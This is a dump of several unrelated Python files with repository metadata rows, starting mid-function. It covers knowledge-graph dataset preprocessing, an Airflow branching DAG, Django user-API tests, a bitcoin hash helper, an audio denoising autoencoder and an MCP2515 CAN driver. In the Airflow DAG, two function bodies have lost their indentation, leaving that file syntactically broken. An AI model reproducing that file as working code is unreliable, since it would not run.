                head, rel, tail = tokens[0], tokens[1], tokens[2]
                # setdefault() evaluates len() before inserting, which yields
                # exactly the next free id when the key is new.
                lstEnts.setdefault(head, len(lstEnts))
                lstRels.setdefault(rel, len(lstRels))
                lstEnts.setdefault(tail, len(lstEnts))
                count += 1
                dst.write(head + '\t' + rel + '\t' + tail + '\n')
        print('Size of', split + '_marked set:', count)

    def _dump_ids(path, id_map):
        # Write "<count>\n" followed by one "label\tid" line per entry,
        # preserving insertion (id) order.
        with open(path, 'w') as out:
            out.write(str(len(id_map)))
            out.write('\n')
            for label, idno in id_map.items():
                out.write(label + '\t' + str(idno))
                out.write('\n')

    for split in ('train', 'valid', 'test'):
        _index_split(split)

    _dump_ids(folder + 'entity2id.txt', lstEnts)
    _dump_ids(folder + 'relation2id.txt', lstRels)
# Build the id lookup files from the raw splits.
print("[LOG] Init entity and relation id.")
getID(folder=args.folder)
# Reload the id tables; skiprows=1 skips the leading count line.
print("[LOG] Read entity and relation id.")
entity2id = pd.read_table(args.folder+"entity2id.txt", header=None, sep='\t', skiprows=1)
relation2id = pd.read_table(args.folder+"relation2id.txt", header=None, sep='\t', skiprows=1)
print("[LOG] Read train, test and validation set.")
train = pd.read_table(args.folder+"/train.txt", header=None, sep='\t')
test = pd.read_table(args.folder+"/test.txt", header=None, sep='\t')
valid = pd.read_table(args.folder+"/valid.txt", header=None, sep='\t')
# Swap columns 1 and 2: raw order is (head, relation, tail); OpenKE's 2id
# format expects (head, tail, relation).
train[[1, 2]] = train[[2, 1]]
valid[[1, 2]] = valid[[2, 1]]
test[[1, 2]] = test[[2, 1]]
# label -> id lookup dicts: d for relations, e for entities.
d = dict(zip(relation2id[0].values, relation2id[1].values))
e = dict(zip(entity2id[0].values, entity2id[1].values))
print("[LOG] Mapping train, validation and test data with id.")
def mapping(data, ent_map=None, rel_map=None):
    """Translate labels to integer ids in place.

    Columns 0 and 1 of *data* hold entity labels (head, tail) and column 2
    holds the relation label.  *ent_map* / *rel_map* default to the
    module-level lookup dicts ``e`` and ``d`` built above, so existing
    callers keep their behaviour; passing explicit dicts makes the function
    reusable (and testable) without relying on module globals.
    """
    ent_map = e if ent_map is None else ent_map
    rel_map = d if rel_map is None else rel_map
    data[0] = data[0].map(ent_map)
    data[1] = data[1].map(ent_map)
    data[2] = data[2].map(rel_map)
mapping(train)
mapping(valid)
mapping(test)
# Write each split as "<count>\n" followed by space-separated id triples
# (appended via to_csv in 'a' mode after the count line).
train_file = open(args.folder+"/train2id.txt", "w")
train_file.write("%d\n" % (train.shape[0]))
train.to_csv(train_file, header=None, index=None, sep=" ", mode='a')
train_file.close()
valid_file = open(args.folder+"/valid2id.txt", "w")
valid_file.write("%d\n" % (valid.shape[0]))
valid.to_csv(valid_file, header=None, index=None, sep=" ", mode='a')
valid_file.close()
test_file = open(args.folder+"/test2id.txt", "w")
test_file.write("%d\n" % (test.shape[0]))
test.to_csv(test_file, header=None, index=None, sep=" ", mode='a')
test_file.close()
# lef[(h, r)] -> list of tails, rig[(r, t)] -> list of heads; rellef/relrig
# record which heads/tails each relation has been seen with.
lef = {}
rig = {}
rellef = {}
relrig = {}
# NOTE: these file handles intentionally shadow the `valid`/`test`
# DataFrames above, which are no longer needed at this point.
triple = open(args.folder+"train2id.txt", "r")
valid = open(args.folder+"valid2id.txt", "r")
test = open(args.folder+"test2id.txt", "r")
# Accumulate head/tail statistics from all three splits.  Each 2id line is
# "h t r"; the first line of each file is the triple count.
print("[LOG] Training file reading ... ")
tot = (int)(triple.readline())
print("[LOG] Total training file: {}".format(tot))
for i in range(tot):
    content = triple.readline()
    h, t, r = content.strip().split()
    if not (h, r) in lef:
        lef[(h, r)] = []
    if not (r, t) in rig:
        rig[(r, t)] = []
    lef[(h, r)].append(t)
    rig[(r, t)].append(h)
    if not r in rellef:
        rellef[r] = {}
    if not r in relrig:
        relrig[r] = {}
    rellef[r][h] = 1
    relrig[r][t] = 1
print("[LOG] Validation file reading ...")
tot = (int)(valid.readline())
print("[LOG] Total validation file: {}".format(tot))
for i in range(tot):
    content = valid.readline()
    h, t, r = content.strip().split()
    if not (h, r) in lef:
        lef[(h, r)] = []
    if not (r, t) in rig:
        rig[(r, t)] = []
    lef[(h, r)].append(t)
    rig[(r, t)].append(h)
    if not r in rellef:
        rellef[r] = {}
    if not r in relrig:
        relrig[r] = {}
    rellef[r][h] = 1
    relrig[r][t] = 1
print("[LOG] Test file reading ... ")
tot = (int)(test.readline())
print("[LOG] Total test file: {}".format(tot))
for i in range(tot):
    content = test.readline()
    h, t, r = content.strip().split()
    if not (h, r) in lef:
        lef[(h, r)] = []
    if not (r, t) in rig:
        rig[(r, t)] = []
    lef[(h, r)].append(t)
    rig[(r, t)].append(h)
    if not r in rellef:
        rellef[r] = {}
    if not r in relrig:
        relrig[r] = {}
    rellef[r][h] = 1
    relrig[r][t] = 1
test.close()
valid.close()
triple.close()
# type_constrain.txt: for every relation, one line listing all heads it was
# seen with, then one line listing all tails (OpenKE's expected layout).
print("[LOG] Type constraint processing ... ")
f = open(args.folder+"type_constrain.txt", "w")
f.write("%d\n" % (len(rellef)))
for i in rellef:
    f.write("%s\t%d" % (i, len(rellef[i])))
    for j in rellef[i]:
        f.write("\t%s" % (j))
    f.write("\n")
    f.write("%s\t%d" % (i, len(relrig[i])))
    for j in relrig[i]:
        f.write("\t%s" % (j))
    f.write("\n")
f.close()
# Re-use the names for per-relation averages: rellef[r]/totlef[r] is the
# average number of tails per (h, r) pair; relrig[r]/totrig[r] the average
# number of heads per (r, t) pair.
rellef = {}
totlef = {}
relrig = {}
totrig = {}
# lef: (h, r)
# rig: (r, t)
for i in lef:
    if not i[1] in rellef:
        rellef[i[1]] = 0
        totlef[i[1]] = 0
    rellef[i[1]] += len(lef[i])
    totlef[i[1]] += 1.0
for i in rig:
    if not i[0] in relrig:
        relrig[i[0]] = 0
        totrig[i[0]] = 0
    relrig[i[0]] += len(rig[i])
    totrig[i[0]] += 1.0
# Count test triples per relation category (1-1, 1-n, n-1, n-n) using the
# conventional 1.5 average-degree threshold.
s11 = 0
s1n = 0
sn1 = 0
snn = 0
f = open(args.folder+"test2id.txt", "r")
tot = (int)(f.readline())
for i in range(tot):
    content = f.readline()
    h, t, r = content.strip().split()
    rign = rellef[r] / totlef[r]
    lefn = relrig[r] / totrig[r]
    if (rign < 1.5 and lefn < 1.5):
        s11 += 1
    if (rign >= 1.5 and lefn < 1.5):
        s1n += 1
    if (rign < 1.5 and lefn >= 1.5):
        sn1 += 1
    if (rign >= 1.5 and lefn >= 1.5):
        snn += 1
f.close()
# Split the test set by relation category into 1-1 / 1-n / n-1 / n-n files,
# plus test2id_all.txt where each triple is prefixed with its category code
# (0..3).  Each output starts with its own triple count.
print("[LOG] Relational type processing ...")
f = open(args.folder+"test2id.txt", "r")
f11 = open(args.folder+"1-1.txt", "w")
f1n = open(args.folder+"1-n.txt", "w")
fn1 = open(args.folder+"n-1.txt", "w")
fnn = open(args.folder+"n-n.txt", "w")
fall = open(args.folder+"test2id_all.txt", "w")
tot = (int)(f.readline())
fall.write("%d\n" % (tot))
f11.write("%d\n" % (s11))
f1n.write("%d\n" % (s1n))
fn1.write("%d\n" % (sn1))
fnn.write("%d\n" % (snn))
for i in range(tot):
    content = f.readline()
    h, t, r = content.strip().split()
    rign = rellef[r] / totlef[r]
    lefn = relrig[r] / totrig[r]
    if (rign < 1.5 and lefn < 1.5):
        f11.write(content)
        fall.write("0"+"\t"+content)
    if (rign >= 1.5 and lefn < 1.5):
        f1n.write(content)
        fall.write("1"+"\t"+content)
    if (rign < 1.5 and lefn >= 1.5):
        fn1.write(content)
        fall.write("2"+"\t"+content)
    if (rign >= 1.5 and lefn >= 1.5):
        fnn.write(content)
        fall.write("3"+"\t"+content)
fall.close()
f.close()
f11.close()
f1n.close()
fn1.close()
fnn.close()
print("[LOG] Shutdown processing ...")
2bafdb3d0198af653fa5dcfa1e0681df79a2f730 | 174 | py | Python | tests/iter_version_dev/V1_0_0/demo.py | liguodongIOT/nlp-app-samples | e0cc747e88c7b5c701b5099462d2dd6277c23381 | [
"Apache-2.0"
] | 1 | 2021-09-30T08:16:21.000Z | 2021-09-30T08:16:21.000Z | tests/iter_version_dev/V1_0_0/demo.py | liguodongIOT/nlp-app-samples | e0cc747e88c7b5c701b5099462d2dd6277c23381 | [
"Apache-2.0"
] | null | null | null | tests/iter_version_dev/V1_0_0/demo.py | liguodongIOT/nlp-app-samples | e0cc747e88c7b5c701b5099462d2dd6277c23381 | [
"Apache-2.0"
] | 1 | 2021-11-24T06:24:44.000Z | 2021-11-24T06:24:44.000Z | from nlp_app_samples.constants import APP_NAME
from tests.iter_version_dev.V1_0_0.classification_lr import TASK_DICT
# Smoke-test the imports above by echoing the imported constants.
print(APP_NAME)
print(TASK_DICT)
print("over....")
| 14.5 | 69 | 0.810345 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.057471 |
2bb18f8af966069191addc5d4539af9522722cdb | 2,392 | py | Python | airflow/dags/xcom_dag.py | KoiDev13/airflow_lab | 40ce005615486356a59deff46f3594b2343a8b4d | [
"Apache-2.0"
] | null | null | null | airflow/dags/xcom_dag.py | KoiDev13/airflow_lab | 40ce005615486356a59deff46f3594b2343a8b4d | [
"Apache-2.0"
] | null | null | null | airflow/dags/xcom_dag.py | KoiDev13/airflow_lab | 40ce005615486356a59deff46f3594b2343a8b4d | [
"Apache-2.0"
] | null | null | null | from airflow import DAG
from airflow.operators.bash import BashOperator
from airflow.operators.python import PythonOperator, BranchPythonOperator #Looking for a way to choose one task or another according to condition
# from airflow.operators.subdag import SubDagOperator
from airflow.utils.task_group import TaskGroup #Create multiple tasks in a group
from airflow.operators.dummy import DummyOperator #For dummy test
from random import uniform
from datetime import datetime
# Default arguments applied to every task of the DAG defined below.
default_args = {
    'start_date': datetime(2020, 1, 1)
}
def _training_model(ti):
accuracy = uniform(0.1, 10.0) #Uniform method from random
print(f'model\'s accuracy: {accuracy}')
ti.xcom_push(key='model_accuracy', value=accuracy) #truyền tham số xcom vào kết quả return
def _choose_best_model(ti):
print('choose best model')
accuracies=ti.xcom_pull(key='model_accuracy', task_ids=[
'processing_tasks.training_model_a',
'processing_tasks.training_model_b',
'processing_tasks.training_model_c'
])
for accuracy in accuracies:
if accuracy > 5:
return 'accurate'
return 'inaccurate'
print(accuracies)
# DAG layout: download -> (3 parallel trainings in a TaskGroup) -> branch ->
# accurate/inaccurate dummy -> storing.
with DAG('xcom_dag', schedule_interval='@daily', default_args=default_args, catchup=False) as dag:
    downloading_data = BashOperator(
        task_id='downloading_data',
        bash_command='sleep 3',
        # No return value worth publishing, so suppress the implicit XCom.
        do_xcom_push=False
    )
    with TaskGroup('processing_tasks') as processing_tasks:
        training_model_a = PythonOperator(
            task_id='training_model_a',
            python_callable=_training_model
        )
        training_model_b = PythonOperator(
            task_id='training_model_b',
            python_callable=_training_model
        )
        training_model_c = PythonOperator(
            task_id='training_model_c',
            python_callable=_training_model  # pushes accuracy to XCom itself
        )
    # BranchPythonOperator follows only the task id returned by the callable.
    choose_model = BranchPythonOperator(
        task_id='choose_best_model',
        python_callable=_choose_best_model
    )
    accurate = DummyOperator(
        task_id = 'accurate',
    )
    inaccurate = DummyOperator(
        task_id = 'inaccurate',
    )
    storing = DummyOperator(
        task_id='storing',
        # Run after the branch even though one of the two parents is skipped.
        trigger_rule = 'none_failed_or_skipped'
    )
    downloading_data >> processing_tasks >> choose_model
    choose_model >> [accurate, inaccurate] >> storing
2bb1dccf1a33e636469d941a73447ed64a4e5e90 | 9,281 | py | Python | v1/users/tests/user.py | buckyroberts/Website-API | e74d202a41533c7622acbe12c793d047d44012ad | [
"MIT"
] | 64 | 2020-10-02T02:58:06.000Z | 2022-01-29T20:00:50.000Z | v1/users/tests/user.py | buckyroberts/Website-API | e74d202a41533c7622acbe12c793d047d44012ad | [
"MIT"
] | 93 | 2020-10-04T22:53:46.000Z | 2022-03-05T18:17:46.000Z | v1/users/tests/user.py | buckyroberts/Website-API | e74d202a41533c7622acbe12c793d047d44012ad | [
"MIT"
] | 21 | 2020-10-11T14:16:13.000Z | 2021-11-09T17:50:25.000Z | from unittest.mock import ANY, MagicMock, patch
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode
from freezegun import freeze_time
from rest_framework import serializers, status
from rest_framework.reverse import reverse
from ..factories.user import UserFactory
from ..models import User
from ...utils.verification import generate_token
# Unauthenticated clients must not be able to delete users.
def test_anon_delete(api_client):
    user = UserFactory()
    r = api_client.delete(reverse('user-detail', (user.pk,)))
    assert r.status_code == status.HTTP_401_UNAUTHORIZED


# The public user list is readable anonymously, stays within 2 queries,
# and serializes the expected fields.
def test_anon_list(api_client, django_assert_max_num_queries):
    users = UserFactory.create_batch(10)
    with django_assert_max_num_queries(2):
        r = api_client.get(reverse('user-list'), {'limit': 0})
    assert r.status_code == status.HTTP_200_OK
    assert len(r.data) == 10
    assert r.data[0] == {
        'account_number': users[0].account_number,
        'created_date': serializers.DateTimeField().to_representation(users[0].created_date),
        'display_name': users[0].display_name,
        'github_username': users[0].github_username,
        'is_email_verified': users[0].is_email_verified,
        'modified_date': serializers.DateTimeField().to_representation(users[0].modified_date),
        'pk': str(users[0].pk),
        'profile_image': '',
        'discord_username': users[0].discord_username,
    }


# Unauthenticated clients must not be able to update users.
def test_anon_patch(api_client):
    user = UserFactory()
    r = api_client.patch(
        reverse('user-detail', (user.pk,)),
        data={
            'display_name': 'Bob'
        },
        format='json'
    )
    assert r.status_code == status.HTTP_401_UNAUTHORIZED


# Anonymous signup is allowed; the account email is mocked out and the
# created user is serialized with frozen timestamps.
@patch('v1.users.views.user.send_account_email', MagicMock(return_value=None))
def test_anon_post(api_client):
    with freeze_time() as frozen_time:
        r = api_client.post(
            reverse('user-list'),
            data={
                'email': 'bucky@email.com',
                'password': 'Pswd43234!',
                'display_name': 'Bucky'
            },
            format='json'
        )
    assert r.status_code == status.HTTP_201_CREATED
    assert r.data == {
        'account_number': '',
        'created_date': serializers.DateTimeField().to_representation(frozen_time()),
        'display_name': 'Bucky',
        'github_username': '',
        'is_email_verified': False,
        'modified_date': serializers.DateTimeField().to_representation(frozen_time()),
        'pk': ANY,
        'profile_image': '',
        'discord_username': '',
    }
    assert User.objects.get(pk=r.data['pk']).display_name == 'Bucky'
# A freshly registered user can be verified via the uid/token link and
# receives an access token on success.
@patch('v1.users.views.user.send_account_email', MagicMock(return_value=None))
def test_user_verification(api_client):
    api_client.post(
        reverse('user-list'),
        data={
            'email': 'bucky@email.com',
            'password': 'Pswd43234!',
            'display_name': 'Bucky'
        },
        format='json'
    )
    uid = urlsafe_base64_encode(force_bytes('bucky@email.com'))
    token = generate_token('bucky@email.com')
    r = api_client.get(reverse('user-list') + '/verify/{}/{}'.format(uid, token),
                       format='json'
                       )
    assert r.status_code == status.HTTP_200_OK
    is_token = 'access_token' in dict(r.data)['authentication']
    assert is_token


# A syntactically invalid token is rejected.
def test_invalid_token_verification(api_client):
    uid = urlsafe_base64_encode(force_bytes('bucky@email.com'))
    token = 'randomstring'
    r = api_client.get(reverse('user-list') + '/verify/{}/{}'.format(uid, token),
                       format='json'
                       )
    assert r.status_code == status.HTTP_400_BAD_REQUEST
    assert r.data['message'] == 'Token is invalid'


# A valid token for a different user's email does not activate this uid.
def test_invalid_link_verification(api_client):
    uid = urlsafe_base64_encode(force_bytes('bucky@email.com'))
    user = UserFactory()
    token = generate_token(user.email)
    r = api_client.get(reverse('user-list') + '/verify/{}/{}'.format(uid, token),
                       format='json'
                       )
    assert r.status_code == status.HTTP_400_BAD_REQUEST
    assert r.data['message'] == 'Invalid activation link'


# A token generated for an unregistered email is rejected as invalid user.
def test_invalid_user_verification(api_client):
    uid = urlsafe_base64_encode(force_bytes('bucky@email.com'))
    token = generate_token('nonregistered@email.com')
    r = api_client.get(reverse('user-list') + '/verify/{}/{}'.format(uid, token),
                       format='json'
                       )
    assert r.status_code == status.HTTP_400_BAD_REQUEST
    assert r.data['message'] == 'Invalid user'
# A registered user can request a fresh verification link by email.
@patch('v1.users.views.user.send_account_email', MagicMock(return_value=None))
def test_user_generate_new_link(api_client):
    api_client.post(
        reverse('user-list'),
        data={
            'email': 'test@thenewboston.com',
            'password': '@secret123',
            'display_name': 'Bucky'
        },
        format='json'
    )
    r = api_client.post(
        reverse('user-list') + '/new-link',
        data={
            'email': 'test@thenewboston.com',
            'req_type': 'verify'
        },
        format='json'
    )
    assert r.status_code == status.HTTP_200_OK
    assert r.data == {
        'mesage': 'A new link has been sent to your email'
    }


# Signup with a password from the common-password list is rejected.
def test_anon_post_common_password(api_client):
    r = api_client.post(
        reverse('user-list'),
        data={
            'email': 'bucky@email.com',
            'password': 'pass1234',
            'display_name': 'Bucky'
        },
        format='json'
    )
    assert r.status_code == status.HTTP_400_BAD_REQUEST


# Authenticated users cannot delete other users' accounts.
def test_other_user_delete(api_client):
    user1 = UserFactory()
    user2 = UserFactory()
    api_client.force_authenticate(user1)
    r = api_client.delete(reverse('user-detail', (user2.pk,)))
    assert r.status_code == status.HTTP_403_FORBIDDEN


# Authenticated users cannot update other users' profiles.
def test_other_user_patch(api_client):
    user1 = UserFactory()
    user2 = UserFactory()
    api_client.force_authenticate(user1)
    r = api_client.patch(
        reverse('user-detail', (user2.pk,)),
        data={
            'display_name': 'Senior Super Dev',
            'github_username': 'senior_super_githuber',
            'discord_username': 'senior_super_discorder',
        },
        format='json'
    )
    assert r.status_code == status.HTTP_403_FORBIDDEN


# Already-authenticated users cannot create additional accounts.
def test_other_user_post(api_client):
    user = UserFactory()
    api_client.force_authenticate(user)
    r = api_client.post(
        reverse('user-list'),
        data={
            'account_number': '4ed6c42c98a9f9b521f434df41e7de87a1543940121c895f3fb383bb8585d3ec',
            'display_name': 'Super Dev',
            'github_username': 'super_githuber',
            'discord_username': 'super_discorder',
        },
        format='json'
    )
    assert r.status_code == status.HTTP_403_FORBIDDEN
# Users cannot delete their own account through this endpoint.
def test_self_delete(api_client):
    user = UserFactory()
    api_client.force_authenticate(user)
    r = api_client.delete(reverse('user-detail', (user.pk,)))
    assert r.status_code == status.HTTP_403_FORBIDDEN


# Users may update their own profile; the serialized response and the DB
# record reflect the change (timestamps frozen for comparison).
def test_self_patch(api_client):
    user = UserFactory()
    api_client.force_authenticate(user)
    with freeze_time() as frozen_time:
        r = api_client.patch(reverse('user-detail', (user.pk,)), data={
            'display_name': 'I am a Senior Super Dev',
            'github_username': 'senior_super_githuber',
            'discord_username': 'senior_super_discorder',
        }, format='json')
    assert r.status_code == status.HTTP_200_OK
    assert r.data == {
        'account_number': user.account_number,
        'created_date': serializers.DateTimeField().to_representation(user.created_date),
        'display_name': 'I am a Senior Super Dev',
        'github_username': 'senior_super_githuber',
        'is_email_verified': False,
        'modified_date': serializers.DateTimeField().to_representation(frozen_time()),
        'pk': str(user.pk),
        'profile_image': '',
        'discord_username': 'senior_super_discorder',
    }
    assert User.objects.get(pk=str(user.pk)).display_name == 'I am a Senior Super Dev'


# Staff may delete any user; the record is removed from the database.
def test_staff_delete(api_client, staff_user):
    api_client.force_authenticate(staff_user)
    user = UserFactory()
    r = api_client.delete(reverse('user-detail', (user.pk,)))
    assert r.status_code == status.HTTP_204_NO_CONTENT
    assert r.data is None
    assert User.objects.filter(pk=str(user.pk)).first() is None


# Staff may not edit other users' profiles.
def test_staff_patch(api_client, staff_user):
    api_client.force_authenticate(staff_user)
    user = UserFactory()
    r = api_client.patch(
        reverse('user-detail', (user.pk,)),
        data={
            'display_name': 'Senior Super Dev',
            'github_username': 'senior_super_githuber',
            'discord_username': 'senior_super_discorder',
        },
        format='json'
    )
    assert r.status_code == status.HTTP_403_FORBIDDEN


# Staff accounts, being authenticated, may not create new users either.
def test_staff_post(api_client, staff_user):
    api_client.force_authenticate(staff_user)
    r = api_client.post(
        reverse('user-list'),
        data={
            'email': 'bucky@email.com',
            'password': 'Pswd43234!',
            'display_name': 'Bucky'
        },
        format='json'
    )
    assert r.status_code == status.HTTP_403_FORBIDDEN
| 30.833887 | 97 | 0.632798 | 0 | 0 | 0 | 0 | 2,349 | 0.253098 | 0 | 0 | 2,263 | 0.243831 |
2bb394837f98ad170af7ac4403fbc8f5bff79198 | 272 | py | Python | newbitcoin/newbitcoin/code-ch03/helper.py | tys-hiroshi/test_programmingbitcoin | 6eb6fb1c087f6dd2cb2b01f527488a904065efa6 | [
"MIT"
] | null | null | null | newbitcoin/newbitcoin/code-ch03/helper.py | tys-hiroshi/test_programmingbitcoin | 6eb6fb1c087f6dd2cb2b01f527488a904065efa6 | [
"MIT"
] | null | null | null | newbitcoin/newbitcoin/code-ch03/helper.py | tys-hiroshi/test_programmingbitcoin | 6eb6fb1c087f6dd2cb2b01f527488a904065efa6 | [
"MIT"
] | null | null | null | from unittest import TestSuite, TextTestRunner
import hashlib
def run(test):
suite = TestSuite()
suite.addTest(test)
TextTestRunner().run(suite)
def hash256(s):
    """Return the double-SHA256 digest of *s* (SHA-256 applied twice)."""
    first_round = hashlib.sha256(s).digest()
    return hashlib.sha256(first_round).digest()
| 18.133333 | 62 | 0.694853 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 26 | 0.095588 |
2bb4e9663798a8ab2fb0c77692479485818ee0ff | 3,085 | py | Python | denoise.py | N11K6/Speech_DeNoiser_AE | 66e55faa430a66a74a4df27d9f96b756056047f2 | [
"MIT"
] | 1 | 2021-03-16T08:58:45.000Z | 2021-03-16T08:58:45.000Z | denoise.py | N11K6/Speech_DeNoiser_AE | 66e55faa430a66a74a4df27d9f96b756056047f2 | [
"MIT"
] | null | null | null | denoise.py | N11K6/Speech_DeNoiser_AE | 66e55faa430a66a74a4df27d9f96b756056047f2 | [
"MIT"
] | 1 | 2021-09-22T10:26:28.000Z | 2021-09-22T10:26:28.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Program to denoise a short speech sample using a pre-trained autoencoder.
PATH_TO_TRAINED_MODEL : path to the pre-trained model (.h5)
PATH_TO_AUDIO : path to the noisy audio file (.wav)
PATH_TO_SAVE : path to save the denoised audio output (.wav)
@author: nk
"""
#%% Dependencies
import numpy as np
import librosa
import soundfile
from tensorflow import keras
#%%
# Paths for the pre-trained autoencoder, the noisy input and the output file.
PATH_TO_TRAINED_MODEL = "./trained_models/audio_denoise_AE.h5"
PATH_TO_AUDIO = "./audio_files/test_noisy.wav"
PATH_TO_SAVE = "./audio_files/new_denoised.wav"
#%%
class _Denoise_AE:
    '''
    Singleton class for denoising short audio samples of spoken words.

    The shared `model` is loaded lazily by the Denoise_AE() factory; this
    class itself never loads it.
    '''
    # Shared Keras model (class attribute, populated by the factory).
    model = None
    # Singleton instance handle (class attribute, managed by the factory).
    _instance = None
    # This is the fitting constant, saved from the training session!
    # Spectrograms are divided by it before inference and multiplied back
    # after, so it must match the value used during training.
    fitting_constant = 7.259422170994068
    # This is the sample rate that the model is configured to work with.
    SAMPLE_RATE = 22050

    def preprocess(self, path_to_audio):
        '''
        Preprocesses audio file located at specified path.
        - Fixes length to 1s (SAMPLE_RATE samples at 22050 Hz)
        - Extracts spectrogram

        NOTE(review): the pad/crop offset is drawn with np.random.randint,
        so preprocessing is nondeterministic for inputs that are not
        exactly 1 s long.
        '''
        data, _ = librosa.load(path_to_audio, sr = self.SAMPLE_RATE)
        duration = self.SAMPLE_RATE
        # Pad to appropriate length... (random split between front/back pad)
        if len(data) < duration:
            max_offset = np.abs(len(data) - duration)
            offset = np.random.randint(max_offset)
            data = np.pad(data, (offset, duration-len(data)-offset), "constant")
        # ... or cut to appropriate length... (random 1 s window)
        elif len(data) > duration:
            max_offset = np.abs(len(data) - duration)
            offset = np.random.randint(max_offset)
            data = data[offset:len(data)-max_offset+offset]
        # ... or leave as is.
        else:
            offset = 0
        # Magnitude spectrogram; [:-1,:] drops the last frequency bin —
        # presumably so the height is a power of two matching the model's
        # input shape (TODO confirm against the training pipeline).
        S = np.abs(librosa.stft(data))[:-1,:]
        return S

    def denoise(self, path_to_audio):
        '''
        Denoises input with autoencoder.

        Returns the denoised time-series waveform reconstructed via
        Griffin-Lim (phase is estimated, not preserved from the input).
        '''
        # Load spectrogram
        S = self.preprocess(path_to_audio)
        # Get dimensions
        dim_1 = S.shape[0]
        dim_2 = S.shape[1]
        # Reshape as input tensor (batch of 1, single channel)
        S = np.reshape(S, (1, dim_1, dim_2, 1))
        # Normalize with the same constant used at training time.
        S /= self.fitting_constant
        # Get denoised spectrogram from autoencoder
        S_denoised = self.model.predict(S).reshape((dim_1, dim_2))
        # Convert denoised spectrogram to time series waveform, undoing
        # the normalization.
        denoised = librosa.griffinlim(S_denoised) * self.fitting_constant
        return denoised
#%%
def Denoise_AE():
    """Factory returning the process-wide _Denoise_AE singleton.

    Lazily creates the instance and loads the Keras model on first use.

    Fix: the original tested ``_Denoise_AE()._instance``, constructing and
    discarding a brand-new instance on every call just to read the class
    attribute; the attribute is now read from the class directly.
    """
    if _Denoise_AE._instance is None:
        _Denoise_AE._instance = _Denoise_AE()
        _Denoise_AE.model = keras.models.load_model(PATH_TO_TRAINED_MODEL)
    return _Denoise_AE._instance
#%%
if __name__ == "__main__":
    # The factory must behave as a singleton: repeated calls return the
    # same object.
    dnae = Denoise_AE()
    dnae2 = Denoise_AE()
    assert dnae is dnae2
    # Denoise the sample file and write the result at the model's rate.
    denoised = dnae.denoise(PATH_TO_AUDIO)
    soundfile.write(PATH_TO_SAVE, denoised, dnae.SAMPLE_RATE)
2bb629029f6d9ac0a63d285ca3b6e11796d43870 | 10,171 | py | Python | mcp2515.py | sifosifo/MCP2515LinuxDriver | 14e933a81626980ec7c9c9830335383fdd7abe3a | [
"BSD-3-Clause"
] | 3 | 2018-01-31T11:54:21.000Z | 2020-02-13T08:12:07.000Z | mcp2515.py | sifosifo/MCP2515LinuxDriver | 14e933a81626980ec7c9c9830335383fdd7abe3a | [
"BSD-3-Clause"
] | 1 | 2020-02-15T06:01:39.000Z | 2020-02-27T05:23:43.000Z | mcp2515.py | sifosifo/MCP2515LinuxDriver | 14e933a81626980ec7c9c9830335383fdd7abe3a | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
import spidev
class mcp2515:
    """Driver for the Microchip MCP2515 stand-alone CAN controller over SPI.

    Register addresses, bit masks and SPI command bytes follow the MCP2515
    datasheet (DS21801).

    Fixes relative to the original:
    - TX1IE / TX1IF were 0x80, colliding with MERRE / MERRF; per the
      datasheet (and consistently with TX1IE_ENABLED / TX1IF_SET below)
      bit 3 (0x08) is correct.
    - The first of the two duplicate TX2IE_DISABLED / TX2IF_RESET
      assignments was evidently meant to be the missing TX1IE_DISABLED /
      TX1IF_RESET; those names are now defined (nothing was removed).
    - SJW_1TQ/2TQ/3TQ corrected to 0x00/0x40/0x80 (SJW occupies CNF1 bits
      7:6; 0x90 was not even inside the 0xC0 SJW mask).
    - ReadRegister / ReadStatus returned their zero-filled TX lists;
      py-spidev's xfer() returns the received bytes rather than mutating
      its argument, so the return value is now captured.
    """

    # SPI instruction set
    SPI_RESET = 0xC0
    SPI_READ = 0x03
    SPI_READ_RX = 0x90
    SPI_WRITE = 0x02
    SPI_WRITE_TX = 0x40
    SPI_RTS = 0x80
    SPI_READ_STATUS = 0xA0
    SPI_RX_STATUS = 0xB0
    SPI_BIT_MODIFY = 0x05

    # Configuration registers
    CANSTAT = 0x0E
    CANCTRL = 0x0F
    BFPCTRL = 0x0C
    TEC = 0x1C
    REC = 0x1D
    CNF3 = 0x28
    CNF2 = 0x29
    CNF1 = 0x2A
    CANINTE = 0x2B
    CANINTF = 0x2C
    EFLG = 0x2D
    TXRTSCTRL = 0x0D

    # Receive filters
    RXF0SIDH = 0x00
    RXF0SIDL = 0x01
    RXF0EID8 = 0x02
    RXF0EID0 = 0x03
    RXF1SIDH = 0x04
    RXF1SIDL = 0x05
    RXF1EID8 = 0x06
    RXF1EID0 = 0x07
    RXF2SIDH = 0x08
    RXF2SIDL = 0x09
    RXF2EID8 = 0x0A
    RXF2EID0 = 0x0B
    RXF3SIDH = 0x10
    RXF3SIDL = 0x11
    RXF3EID8 = 0x12
    RXF3EID0 = 0x13
    RXF4SIDH = 0x14
    RXF4SIDL = 0x15
    RXF4EID8 = 0x16
    RXF4EID0 = 0x17
    RXF5SIDH = 0x18
    RXF5SIDL = 0x19
    RXF5EID8 = 0x1A
    RXF5EID0 = 0x1B

    # Receive masks
    RXM0SIDH = 0x20
    RXM0SIDL = 0x21
    RXM0EID8 = 0x22
    RXM0EID0 = 0x23
    RXM1SIDH = 0x24
    RXM1SIDL = 0x25
    RXM1EID8 = 0x26
    RXM1EID0 = 0x27

    # Tx Buffer 0
    TXB0CTRL = 0x30
    TXB0SIDH = 0x31
    TXB0SIDL = 0x32
    TXB0EID8 = 0x33
    TXB0EID0 = 0x34
    TXB0DLC = 0x35
    TXB0D0 = 0x36
    TXB0D1 = 0x37
    TXB0D2 = 0x38
    TXB0D3 = 0x39
    TXB0D4 = 0x3A
    TXB0D5 = 0x3B
    TXB0D6 = 0x3C
    TXB0D7 = 0x3D

    # Tx Buffer 1
    TXB1CTRL = 0x40
    TXB1SIDH = 0x41
    TXB1SIDL = 0x42
    TXB1EID8 = 0x43
    TXB1EID0 = 0x44
    TXB1DLC = 0x45
    TXB1D0 = 0x46
    TXB1D1 = 0x47
    TXB1D2 = 0x48
    TXB1D3 = 0x49
    TXB1D4 = 0x4A
    TXB1D5 = 0x4B
    TXB1D6 = 0x4C
    TXB1D7 = 0x4D

    # Tx Buffer 2
    TXB2CTRL = 0x50
    TXB2SIDH = 0x51
    TXB2SIDL = 0x52
    TXB2EID8 = 0x53
    TXB2EID0 = 0x54
